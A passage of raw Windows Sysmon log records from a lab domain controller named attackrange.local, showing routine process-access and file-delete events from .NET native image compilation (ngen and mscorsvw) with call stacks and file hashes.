10341000x800000000000000023322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9F05-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9F05-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.652{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9F05-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.652{4DB9351A-A27C-60D3-9E05-00000000CF01}6008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\F9S033LRS9\Microsoft.WSMan.Management.ni.dll.auxMD5=1CB7561E7BCAE880BD5A7BC572218649,SHA256=BD8217452A2C1506D20FC2A7B0401D8328395CA94A077B7D5CBF4063BCEE97C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.652{4DB9351A-A27C-60D3-9E05-00000000CF01}6008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\F9S033LRS9\Microsoft.WSMan.Management.ni.dllMD5=80A34BC02236BCD389DC05557BAA0E00,SHA256=6C59E157C035994E4A97AD760E0C591197CC2DEDFE7A0FED2E0F7818547B8C1E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9E05-00000000CF01}6008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.621{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.621{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.605{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9E05-00000000CF01}6008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.605{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9E05-00000000CF01}6008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.605{4DB9351A-A27C-60D3-9D05-00000000CF01}4280NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5O6BTBD8OR\Microsoft.Workflow.Compiler.ni.exe.auxMD5=079DA9039903D290FCCE717D01E67005,SHA256=4C8241178AED467086EC4FFA49FA5250FEDDD28F8515727AD413FC80B20E1178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.605{4DB9351A-A27C-60D3-9D05-00000000CF01}4280NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5O6BTBD8OR\Microsoft.Workflow.Compiler.ni.exeMD5=5B050BCEEEC98CCA37B64DF26CC0BACC,SHA256=BA6EC24DB65416C34548FC6688699D56A2FEB03C56E0C4E9D7D69A468D6C958B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.589{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9D05-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.574{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9D05-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.574{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9D05-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.574{4DB9351A-A27C-60D3-9C05-00000000CF01}6752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OAI221CTAS\Microsoft.WindowsSearch.Commands.ni.dll.auxMD5=F5276DC7D147DF25F6D787A97AE94E6E,SHA256=DABAC4EB07DF9D450A5D0D0F9F20E6D1E861A535F6DB98A4E88B7ECCA7D9B2D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.574{4DB9351A-A27C-60D3-9C05-00000000CF01}6752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OAI221CTAS\Microsoft.WindowsSearch.Commands.ni.dllMD5=E064622385E41F144E880B8456D4D8B1,SHA256=1DB6F746A4580EAE80CE99ACCE1A8C5F6812F541740B183540B4A7D5D5423443,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.558{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9C05-00000000CF01}6752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.542{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9C05-00000000CF01}6752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.542{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9C05-00000000CF01}6752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.527{4DB9351A-A27C-60D3-9B05-00000000CF01}500NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SQT4LD1FHK\Microsoft.WindowsAuthenticationProtocols.Commands.ni.dll.auxMD5=157AFFADDFE3E125D5CD692068CF7851,SHA256=19CAD703F28C0681F8AA48F1EE4A96DCCB07EE23251C86DAAF81F07E39126A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.527{4DB9351A-A27C-60D3-9B05-00000000CF01}500NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SQT4LD1FHK\Microsoft.WindowsAuthenticationProtocols.Commands.ni.dllMD5=03CDC51CDCF86C3AA7AF84A882FC79F9,SHA256=3475064E672CF11A18A25B7ECC8D86E52FA3FCA4383EB98EA5A5485DCD64C1D2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.511{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9B05-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9B05-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9B05-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-A27C-60D3-9A05-00000000CF01}3356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YYIKRJJOQG\Microsoft.Windows.VolumeActivation.Plugin.ni.dll.auxMD5=156838D093600CD6EA5FF943541C241B,SHA256=5A8402F24B908B3C59D701C0CA0A7C10A934D7FE79AA38A1FFAD5EA9B876B139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.496{4DB9351A-A27C-60D3-9A05-00000000CF01}3356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YYIKRJJOQG\Microsoft.Windows.VolumeActivation.Plugin.ni.dllMD5=B2199A050FBC5CDFCEFE25D60E90C952,SHA256=914C9818BAAC7578B7CCEE600A59A9E9A566E99CE6028C625A09514ECCF52B90,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.464{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 